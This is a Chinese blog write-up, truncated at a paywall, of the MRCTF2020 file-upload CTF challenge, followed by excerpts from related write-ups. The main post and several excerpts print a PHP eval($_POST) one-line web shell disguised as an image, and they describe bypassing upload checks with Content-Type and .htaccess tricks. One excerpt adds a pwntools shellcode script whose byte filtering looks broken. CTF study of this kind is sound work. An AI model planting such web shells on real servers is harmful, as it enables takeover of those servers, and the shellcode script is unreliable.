[MRCTF2020]你传你呢

最新推荐文章于 2025-11-29 23:05:46 发布
原创 最新推荐文章于 2025-11-29 23:05:46 发布 · 984 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #信息安全

本文介绍了MRCTF2020比赛中涉及的文件上传漏洞利用,包括图片马、Content-Type验证绕过及.htaccess文件的使用。通过信息收集,发现后端为PHP,利用特定字典尝试文件上传。最终,作者通过修改Content-Type并利用图片马创建了.htaccess文件,成功获取蚁剑连接,但由于disable_functions限制,无法直接读取flag,只能下载。

知识点

文件上传:图片马&Content-Type验证&.htacess文件

信息收集

应该是考察文件上传,后端是php。
考虑到文件上传姿势比较多,如果一个个试很浪费时间,所以这里找了个php文件上传的字典
貌似是图片马可以,所以可以开始利用

利用过程

准备一张图片马,命名shell.png

   <?php @eval($_POST['attack']) ?>

.htaccess文件

最低0.47元/天 解锁文章
CTF 总结01:文件上绕过
weixin_42789937的博客
12-11 9730
文件上的番外,一句话木绕过思路,第二版整理,还是会根据做题经验增补的~
[GXYCTF2019]BabyUpload(典型图片基础绕过流程)
EC_Carrot的博客
11-05 2574
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [GXYCTF2019]BabyUpload 这题坑了我一小会,我就在想这都能坑到我,真的是太年轻了(`-д-;)ゞ 试了一下gif,jpg用不了,png是可以的 上php提示不能上后缀名带ph的文件 再测试上.htaccess文件 发现改type为image/jpeg能上成功 到这里不难猜出是图片getshell了 拿蚁剑连拿fla
【BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 6529
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
CTF图片制作
最新发布
网络安全
11-29 384
病毒隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。原理:把一句话木,通过二进制的方式追加到图片文件末尾,将木文件和图片合并为另一个图片文件,合并后的图片包含一句话木而且不影响图片显示,但用记事本等文本编辑器打开,能看到图片末尾的恶意代码。然后将图片到网站中,利用网站的漏洞,通常是文件包含漏洞,让网站把上图片当成脚本代码解析,从而达到运行恶意代码控制网站服务器的目的。
[MRCTF2020]你你呢1
:-)
03-31 1956
[MRCTF2020]你你????呢1 STEP1:尝试改写文件头和和文件内容 显示: 判断可能与user.ini或.htaccess文件有关 STEP2:上.htaccess文件 显示: 上成功,上一个1.png文件 STEP3:上1.png文件包含一句木 显示: STEP4:蚁剑连接 显示: 得到flag ...
[MRCTF2020]你你呢 1
qq_43618536的博客
07-03 1408
BUUCTF的[MRCTF2020]你你🐎呢 1
BUUCTF-Web-[MRCTF2020]你
m0_61851859的博客
04-03 1121
3.考虑是不是对php进行过滤,尝试黑名单绕过,将文件后缀修改为.phtml等一些后缀名发现上失败。4.将文件类型修改为.jpg类型尝试上并启用burpsuite抓包发现是可以成功上的。一个.htaccess文件去把.jpg解析成.php。把content-type改成image/jpeg。1.打开题目发现文件上位置,猜测为文件上漏洞。7.拼接url使用蚁剑连接,成功找到flag。2.尝试上一句话木,上失败。
[MRCTF2020]你你呢 1 (文件上漏洞,利用.htaccess文件绕过)
weixin_45844670的博客
10-05 1948
在buuctf的练习 https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2 预备知识: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowO
BUUCTF---[MRCTF2020]你你呢1
2201_75556700的博客
03-08 1105
5.需要上一个.htaccess的文件来把jpg后缀的文件全都当作php文件来执行,.htsccess文件内容为。3.上shell.jpg文件,显示连接成功,但是用蚁剑连接却连接不上。shell文件内容为。就接下来上.htaccess文件,修改这里。7.接下来我们放包回去,点击forward。8.接下来我们访问shell.jpg文件。6.刚刚我们上了shell.jpg。9.接下来我们使用蚁剑连接。4.用bp抓包,修改属性。
BUU-[MRCTF2020]你
weixin_61800640的博客
01-12 344
----摘自百度百科。.htaccess是wordpress根目录的里的一个纯文本文件,全称是Hypertext Access(超文本入口)。的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。没把配置文件改成图片,蚁剑提示返回值为空(我自己粗心没注意...)将.htaccess改为aaa.png(即第一次上图片)、用户自动重定向、自定义错误页面、改变你的。先试试看上一个正常图片,结果显示错误。上.htaccess文件。flag在最外层目录下。
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 2461
很明显是文件上漏洞,通过🐎可知应该是要一个进去,一开始把自己制作的图片进去后自己的图片不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
热门推荐
weixin_44632787的博客
06-19 1万+
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 2264
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
mrctf2020_shellcode
02-10
### 关于 mrctf2020 Shellcode 题目解析 mrctf2020中的`shellcode_revenge`是一道较为复杂的逆向工程与漏洞利用相结合的题目[^1]。该题目的核心在于理解给定二进制文件的工作机制以及如何构造有效的Shellcode来绕过各种防护措施。 #### 一、环境准备 为了完成此挑战,参赛者通常需要设置一个类似的实验环境,在本地重现目标程序的行为以便更好地分析其逻辑并测试所编写Shellcode的效果。这可能涉及到安装特定版本的操作系统及其补丁级别,并禁用不必要的安全特性如ASLR(Address Space Layout Randomization),DEP(Data Execution Prevention)等。 #### 二、静态分析 通过反汇编工具(例如IDA Pro, Ghidra 或 Radare2)可以获取到可执行文件内部结构的信息,包括但不限于函数调用图谱、字符串表项以及其他有助于推断程序意图的数据片段。对于本题而言,重点是要找到能够被攻击者控制输入影响的部分——即存在缓冲区溢出或其他形式内存破坏缺陷的地方。 #### 三、动态调试 借助GDB这样的调试器可以在运行时监控应用程序状态变化情况,观察数据流走向从而验证假设是否成立;同时也可以用来辅助定位某些难以仅靠静态方法得出结论的关键位置。比如确认哪些寄存器/变量保存着重要指针值或是返回地址之类的东西。 #### 四、构建Payload 基于前面两步获得的知识点,现在应该清楚知道怎样去触发漏洞并将控制权转移到自定义代码上去了。此时就需要精心设计一段紧凑高效的机器指令序列作为最终载荷(Payload),它不仅要实现预期功能(通常是打开shell或者其他远程命令接口),而且还要考虑到实际环境中可能存在的一些限制条件,像坏字符过滤等问题都需要妥善处理好。 ```python # Python脚本用于生成payload from pwn import * context.arch = 'amd64' # 设置架构类型为x86_64 shellcode = asm(shellcraft.sh()) # 使用pwntools库自动组装简单的execve("/bin/sh") shellcode bad_chars = b'\x00\x0a\x0d' # 定义不允许出现的字节列表 filtered_shellcode = ''.join([chr(ord(c)) for c in shellcode if ord(c) not in bad_chars]) # 过滤掉非法字符 print(filtered_shellcode.encode('latin-1')) # 输出经过筛选后的shellcode供后续使用 ``` #### 五、提交Flag 当一切准备工作都完成后就可以尝试发送构造好的exploit至服务器端口等待响应了。如果成功的话将会得到交互式的shell访问权限进而读取flag文本内容完成解题过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值